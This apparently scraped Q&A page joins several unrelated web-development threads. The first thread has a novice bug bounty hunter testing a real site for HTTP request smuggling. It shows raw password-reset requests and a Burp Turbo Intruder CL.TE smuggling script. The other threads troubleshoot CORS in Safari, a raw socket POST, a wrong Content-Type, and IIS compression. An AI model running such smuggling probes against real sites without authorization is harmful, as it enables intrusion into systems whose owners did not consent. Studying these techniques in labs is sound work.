I'm a bug bounty hunter and just new to it. Few days ago, I read about the request smuggling vulnerability. And just after that, I started to find it on the Internet. Yesterday, I found a website that when I add X-Forwarded-Host: google.com to the header, it redirected me to https://www.google.com. It's very hard to exploit this so I have think about combine it with request smuggling. I choose the change password request as the target:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
I convert it to chunked:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
6b
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
0
But when I sent it, it gave me the 503 client read error code. Look like it doesn't accept chunked. But, I still want to continue, so I download HTTP Request Smuggler and Turbo Intruder extensions on Burp Suite. Then I do Smuggle attack (CL.TE). It give a smuggle attack python code:
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
def queueRequests(target, wordlists):
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0,
engine=Engine.THREADED,
)
# This will prefix the victim's request. Edit it to achieve the desired effect.
prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''
# The request engine will auto-fix the content-length for us
attack = target.req + prefix
engine.queue(attack)
victim = target.req
for i in range(14):
engine.queue(victim)
time.sleep(0.05)
def handleResponse(req, interesting):
table.add(req)
Then I run it using Turbo Intruder. And I was very surprise, it sent 14 requests but just 12 requests are 503 and 2 left are 200. Special, in the 200 response header, it has ...transfer-encoding: chunked.... I have tried few times and it just gave the same result: 1 or 2 requests are 200. But something strange here, in the code, it's ...prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''.... After few tests I think that it's not the request smuggling bug because the response shown that it is the response of the original request, not the prefix in the code (I have tried to change the prefix too and it's still 200, not 400, 404, ... like I expect).
So is there anyone(must be a very professional hacker) know what vulnerability am I facing? Thank you!
First of all, your first converted reuest in chunked in TE;CL but after using burp extension you found its CL;TE, so the problem may be there.
As with responses you are a bit confused, i recommend you to solve portswigger http request smuggling labs as i have completed that recently by which your fundamentals will get pretty strong!
Related
I'm trying to run a web application that I've built in an iframe on another domain. I'm able to load the page within the iframe, but any ajax requests on the page result in a 403 error as per below:
Request URL: https://test.mydomain.com/get_extra_services/
Request Method: POST
Status Code: 403 Forbidden
Remote Address: 207.38.86.14:443
Referrer Policy: no-referrer-when-downgrade
Connection: keep-alive
Content-Length: 1382
Content-Type: text/html
Date: Thu, 18 Jun 2020 22:57:41 GMT
Server: nginx
X-Content-Type-Options: nosniff
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Content-Length: 22
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: _ga=GA1.2.2146753382.1592180975; _gid=GA1.2.1219012919.1592286837
DNT: 1
Host: test.mydomain.com
Origin: https://test.mydomain.com
Referer: https://test.mydomain.com/order/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
X-CSRFToken: null
X-Requested-With: XMLHttpRequest
serviceid: 18
checked: 1
Any thoughts on what is causing this error?
Thanks!
You need to setup CORS to make requests from a different domain.
https://enable-cors.org/
I am running a React (16) webapp (deployed on Netlify) that is failing with one if its API calls being blocked by CORS but only in Safari. There's no problem in Chrome or Firefox. The console shows the following:
Origin https://chicha.netlify.app is not allowed by Access-Control-Allow-Origin.
XMLHttpRequest cannot load https://chicha-api.herokuapp.com/votes due to access control checks.
Failed to load resource: Origin https://chicha.netlify.app is not allowed by Access-Control-Allow-Origin.
Headers of the blocked request (Safari):
Summary
URL: https://chicha-api.herokuapp.com/votes
Status: —
Source: —
Initiator:
xhr.js:178
Request
Accept: application/json, text/plain, */*
Origin: https://chicha.netlify.app
Referer: https://chicha.netlify.app/events
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
X-Requested-With: XMLHttpRequest
Response
No response headers
Here are the headers of the same request that is not blocked (Chrome):
Request URL: https://chicha-api.herokuapp.com/votes
Request Method: OPTIONS
Status Code: 204 No Content
Remote Address: 52.214.138.78:443
Referrer Policy: no-referrer-when-downgrade
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: x-requested-with
Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
Access-Control-Allow-Origin: https://chicha.netlify.app
Connection: keep-alive
Content-Length: 0
Date: Wed, 03 Jun 2020 10:43:59 GMT
Server: Cowboy
Vary: Origin, Access-Control-Request-Headers
Via: 1.1 vegur
X-Powered-By: Express
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en,es;q=0.9,ca;q=0.8,fr;q=0.7
Access-Control-Request-Headers: x-requested-with
Access-Control-Request-Method: GET
Connection: keep-alive
Host: chicha-api.herokuapp.com
Origin: https://chicha.netlify.app
Referer: https://chicha.netlify.app/events
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
The app makes the call with axios configured as followed:
class ApiClient {
constructor() {
this.apiClient = axios.create({
baseURL: process.env.REACT_APP_BACKEND_URI,
withCredentials: true,
headers: { 'X-Requested-With': 'XMLHttpRequest' },
});
}
getVotes = () => this.apiClient.get('/votes');
getEvents = () => this.apiClient.get('/events');
...
The API (Node.js with Express deployed on Heroku) has the following CORS configuration:
app.use(
cors({
credentials: true,
origin: [process.env.FRONTEND_DOMAIN],
})
);
... where FRONTEND_DOMAIN is https://chicha.netlify.app in environment config vars on Heroku.
What's strange is other API requests have no issue. API headers of a successful request (Safari):
Summary
URL: https://chicha-api.herokuapp.com/events
Status: 304 Not Modified
Source: Memory Cache
Address: 52.215.119.172:443
Initiator:
xhr.js:178
Request
GET /events HTTP/1.1
Accept: application/json, text/plain, */*
Origin: https://chicha.netlify.app
Accept-Language: en-gb
If-None-Match: W/"c010-APRvUYTowK2az7ovB1dPcY+SGuk"
Host: chicha-api.herokuapp.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Referer: https://chicha.netlify.app/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Response
HTTP/1.1 304 Not Modified
Connection: keep-alive
Access-Control-Allow-Credentials: true
ETag: W/"c010-APRvUYTowK2az7ovB1dPcY+SGuk"
Date: Wed, 03 Jun 2020 10:26:18 GMT
Via: 1.1 vegur
Access-Control-Allow-Origin: https://chicha.netlify.app
Content-Length: 0
Vary: Origin
Server: Cowboy
X-Powered-By: Express
Does the fact that the blocked request has a referrer which is distinct from origin matter? Or perhaps some issue with the cookie not being sent with the request (despite the withCredentials configuration in axios)?
EDIT (4 Jun 2020): I've been able to replicate this on localhost, so I'm editing to indicate it's just an issue in Safari. Given related questions and some testing I believe this has to do with the allowedHeaders / CORS Access-Control-Allow-Headers configuration and maybe the way Safari configures OPTIONS preflight request. I haven't been able to see all the request details even configuring Reactotron and apisauce.
EDIT (7 Jun 2020): so I've noted cookies aren't being set in Safari, so the currentUser I set into express on the server side is not persisting (in req.session.currentUser where I set it after login). Also while I was able to produce the error at one point in localhost I am not able to reliably replicate it locally.
It turns out Safari was blocking the cookie sent from my API as a result of the "Prevent cross-site tracking" option in Safari privacy settings. Disabling this and everything works perfectly.
So it seems the only workaround is to place the API on the same domain as the web app, or to use a proxy, as referenced in this question and answer:
Is there a workaround for Safari iOS "Prevent Cross Site Tracking" option, when issuing cookies from API on different domain?
EDIT: The following answer only applies to localhost development, not for when this issue also happens on a remote server. It's a temporary solution in development mode.
Well, if someone else finds this question, there's an easy fix in Safari. First, make sure you have your Develop menu in the menu bar by going to "Safari" -> "Settings" and in the tab "Advanced" select the option "Show Develop menu in menu bar". Once this is done, you should see the Develop menu. Now, select "Develop" -> "Disable Cross-Origin Restrictions".
Disable Cross-Origin Restrictions in Develop menu
I'm trying to use the net module in nodejs to send a POST request while connecting to a socket.
I've tried sending a GET request which indeed does work, but I can't seem to get the POST request to work.
This is the code:
socket.write(`POST /page.php HTTP/1.1\r\n
Host: domain.com\r\n
Connection: close\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\r\n
User-Agent: Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13\r\n
Upgrade-Insecure-Requests: 1\r\n
Accept-Encoding: gzip, deflate\r\n
Accept-Language: en-US,en;q=0.9\r\n
Cache-Control: max-age=0\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 0\r\n\r\n`);
I've "debugged" it, and I've noticed some 301 Moved Permanently and Temporarily redirected responses from the host.
I've set up my simple website with valid Let's Encrypt SSL certificate (from certbot). My nginx config is very short and trivial.
Website shows up correctly in latest Firefox. It shows 404 page, which is OK to me and should work as expected: 404 page.
If I try Google Chrome, i get an error:
The webpage at https://example.org/ might be temporarily down or it
may have moved permanently to a new web address.
ERR_INVALID_SIGNED_EXCHANGE
I assume that the application/signed-exchange header may cause this.
What is this header and should i remove it from response?
Request
GET / HTTP/1.1
Host: example.org
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,ru;q=0.8
DNT: 1
example.org example.org
Response
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 29 Mar 2019 12:05:49 GMT
Content-Type: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Content-Length: 345
Connection: keep-alive
What to fix?
The Content-Type in the response is incorrect. It should be a single type, as Steffen Ullrich said. For a 404 page, I suspect you want Content-Type: text/html.
This may be something particular to your nginx config. On my server, 404 pages have Content-Type: text/html.
I have a Server 2012 R2 box running IIS. I've tried enabling compression for several sites running on that box, but I can't figure out why it won't work. My request headers all show accept-encoding, but the response headers are always Transfer-Encoding:chunked and Vary:Accept-Encoding. The following steps have been performed to try to get gzip compression working:
Dynamic and Static compression have been enabled on each site and at the machine level
Both compression methods are installed from Server Manager
Httpcompression and urlcompression nodes have been manually added to web.configs
Mime types are defined for compression
frequentHitThreshold has been set to 1, so all content should be compressed after the first attempt to access it
A trace has been done to see why compression isn't occurring. The only information I have is the code DYNAMIC_COMPRESSION_NOT_SUCCESS with a reason of 1.
Here are the headers:
GET http://redactedservername:8082/ HTTP/1.1
Host: redactedservername:8082
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: ASP.NET_SessionId=gnqovt55ggt22lycufudc0ns
`
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 22 Jun 2016 14:00:57 GMT
Transfer-Encoding: chunked
What other steps can be performed to get compression to work?
Compression was working, but ESET Antivirus was doing its job of monitoring web traffic. This modified the response and I didn't get gzip content encoding as expected. Disabling ESET and testing again showed that compression was functioning.